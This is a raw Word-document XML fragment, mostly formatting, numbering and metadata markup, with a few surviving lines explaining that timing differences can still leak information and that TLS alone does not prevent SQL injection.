    <w:p w14:paraId="524E58CE" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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But timing difference still observable</w:t>
      </w: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2B1B43C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165C216A" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Content hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A9B26" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Timing still leaks information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659EF11F" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081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865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This is why TLS alone does NOT prevent SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F134003" w14:textId="77777777" w:rsidR="00812865" w:rsidRDefault="00812865"/>
    <w:sectPr w:rsidR="00812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A9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48A8B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F0CD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2C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317E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4FA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1184A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12A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35F65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD98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260D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD04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B5258"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6AEE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56B04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B76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0A19E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27E8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46BBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="202A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C3030"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B4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8112E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84F0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E0FB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE0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D4276"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0AC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D3062"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDF2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766E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB98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E4FCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0DA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E3A55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D96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464C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC5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3301C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBE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A0831"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E95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B36C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1B2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6C43A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0D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A3B88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A0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856262">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="479420849">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1868641104">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2064057808">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="600339302">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="761267545">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="377973744">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1824731613">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1766533499">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="967975859">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1443375120">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1516916230">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1337418798">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1917593930">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1756054586">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="2071416883">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1034845404">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1960838588">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="749161130">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1063068787">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1119494795">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1042747965">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1851796548">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="2014042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65"/>
    <w:rsid w:val="004F7E9A"/>
    <w:rsid w:val="00575DE5"/>
    <w:rsid w:val="00812865"/>
    <w:rsid w:val="00BB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306B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{30FEB9D8-AABB-4EA0-AF3B-B09AAC5F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2008</Words>
  <Characters>11747</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>367</Lines>
  <Paragraphs>149</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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Sehgal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rakesh Kumar Sehgal</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-27T05:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-27T05:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>